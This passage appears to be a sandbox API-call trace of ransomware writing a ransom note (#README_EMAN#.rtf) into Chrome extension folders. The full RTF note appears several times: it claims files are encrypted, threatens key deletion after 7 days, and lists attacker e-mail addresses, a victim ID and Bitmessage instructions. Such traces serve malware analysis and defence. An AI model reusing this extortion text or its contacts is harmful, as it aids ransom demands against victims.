n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\n=typeof b)return b;try{\x03\x1e", lpUsedDefaultChar=0x0) returned 8717 [0283.750] WriteFile (in: hFile=0x2cc, lpBuffer=0x245c778*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x245c778*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0283.750] CloseHandle (hObject=0x2cc) returned 1 [0283.750] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\el\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\el\\#readme_eman#.rtf")) returned 0xffffffff [0283.751] GetLastError () returned 0x2 [0283.751] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\el\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\el\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2cc [0283.752] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0283.752] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0283.752] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x245c778, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 